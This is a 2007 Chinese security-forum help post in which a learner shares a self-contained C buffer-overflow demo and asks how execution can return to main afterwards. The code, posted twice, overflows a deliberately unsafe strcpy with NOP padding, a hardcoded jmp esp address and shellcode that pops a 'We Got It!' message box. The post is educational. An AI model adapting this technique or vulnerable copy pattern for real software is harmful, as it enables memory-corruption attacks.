-
-
[求助]学习shellcode遇到一个问题,高手帮忙啊~!
-
发表于: 2007-3-15 11:13
-
#include <string.h>
#include <stdio.h>
#include <windows.h>
#define JUMPESP "\x28\x59\xD8\x77"
unsigned char eip[8] = JUMPESP;
unsigned char sploit[] =
{
"\x60"
"\x8B\xEC"
"\x83\xEC\x54"
"\x33\xC9"
"\xC6\x45\xDB\x75"
"\xC6\x45\xDC\x73"
"\xC6\x45\xDD\x65"
"\xC6\x45\xDE\x72"
"\xC6\x45\xDF\x33"
"\xC6\x45\xE0\x32"
"\xC6\x45\xE7\x2E"
"\xC6\x45\xE\x64"
"\xC6\x45\xE9\x6C"
"\xC6\x45\xEA\x6C"
"\x88\x4D\xEB"
"\x8D\x45\xDB"
"\x50"
"\xB8\x77\x1D\x80\x7C"
"\xFF\xD0"
"\x55"
"\x51"
"\x8B\xEC"
"\x83\xEC\x54"
"\x33\xC9"
"\xC6\x45\xEC\x53"
"\xC6\x45\xED\x75"
"\xC6\x45\xEE\x63"
"\xC6\x45\xEF\x63"
"\xC6\x45\xF0\x65"
"\xC6\x45\xF1\x73"
"\xC6\x45\xF2\x73"
"\x88\x4D\xF3"
"\xC6\x45\xF4\x57"
"\xC6\x45\xF5\x65"
"\xC6\x45\xF6\x20"
"\xC6\x45\xF7\x47"
"\xC6\x45\xF8\x6F"
"\xC6\x45\xF9\x74"
"\xC6\x45\xFA\x20"
"\xC6\x45\xFB\x49"
"\xC6\x45\xFC\x74"
"\xC6\x45\xFD\x21"
"\x88\x4D\xFE"
"\x51"
"\x8D\x45\xEC"
"\x50"
"\x8D\x45\xF4"
"\x50"
"\x51"
"\xB8\xEA\x04\xD5\x77"
"\xFF\xD0"
"\x33\xDB"
"\x53"
"\xB8\xA2\xCA\x81\x7C"
"\xFF\xD0"
"\x8B\xE5"
"\x61"
};
int MyCopy( char* str )
{
char buff1[50];
strcpy(buff1,str);
return 1;
}
int main()
{
HINSTANCE u32=NULL;
u32=LoadLibrary("user32.dll");
if(u32==NULL)
{
printf("cann't load user32.dll");
}
char Buff[1024];
memset(&Buff,0,sizeof(Buff));
for(int i=0;i<56;Buff[i++]=0x90);
strcpy(Buff+56,(char *)eip);//
strcpy(Buff+60,(char *)sploit);//
MyCopy(Buff);
printf("\n successed \n");
return 0;
}
//一个简单的缓冲区溢出
当溢出成功后,如何返回到main函数中继续后面的执行呢?
留个qq:406670611
#include <stdio.h>
#include <windows.h>
#define JUMPESP "\x28\x59\xD8\x77"
unsigned char eip[8] = JUMPESP;
unsigned char sploit[] =
{
"\x60"
"\x8B\xEC"
"\x83\xEC\x54"
"\x33\xC9"
"\xC6\x45\xDB\x75"
"\xC6\x45\xDC\x73"
"\xC6\x45\xDD\x65"
"\xC6\x45\xDE\x72"
"\xC6\x45\xDF\x33"
"\xC6\x45\xE0\x32"
"\xC6\x45\xE7\x2E"
"\xC6\x45\xE\x64"
"\xC6\x45\xE9\x6C"
"\xC6\x45\xEA\x6C"
"\x88\x4D\xEB"
"\x8D\x45\xDB"
"\x50"
"\xB8\x77\x1D\x80\x7C"
"\xFF\xD0"
"\x55"
"\x51"
"\x8B\xEC"
"\x83\xEC\x54"
"\x33\xC9"
"\xC6\x45\xEC\x53"
"\xC6\x45\xED\x75"
"\xC6\x45\xEE\x63"
"\xC6\x45\xEF\x63"
"\xC6\x45\xF0\x65"
"\xC6\x45\xF1\x73"
"\xC6\x45\xF2\x73"
"\x88\x4D\xF3"
"\xC6\x45\xF4\x57"
"\xC6\x45\xF5\x65"
"\xC6\x45\xF6\x20"
"\xC6\x45\xF7\x47"
"\xC6\x45\xF8\x6F"
"\xC6\x45\xF9\x74"
"\xC6\x45\xFA\x20"
"\xC6\x45\xFB\x49"
"\xC6\x45\xFC\x74"
"\xC6\x45\xFD\x21"
"\x88\x4D\xFE"
"\x51"
"\x8D\x45\xEC"
"\x50"
"\x8D\x45\xF4"
"\x50"
"\x51"
"\xB8\xEA\x04\xD5\x77"
"\xFF\xD0"
"\x33\xDB"
"\x53"
"\xB8\xA2\xCA\x81\x7C"
"\xFF\xD0"
"\x8B\xE5"
"\x61"
};
int MyCopy( char* str )
{
char buff1[50];
strcpy(buff1,str);
return 1;
}
int main()
{
HINSTANCE u32=NULL;
u32=LoadLibrary("user32.dll");
if(u32==NULL)
{
printf("cann't load user32.dll");
}
char Buff[1024];
memset(&Buff,0,sizeof(Buff));
for(int i=0;i<56;Buff[i++]=0x90);
strcpy(Buff+56,(char *)eip);//
strcpy(Buff+60,(char *)sploit);//
MyCopy(Buff);
printf("\n successed \n");
return 0;
}
//一个简单的缓冲区溢出
当溢出成功后,如何返回到main函数中继续后面的执行呢?
留个qq:406670611
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
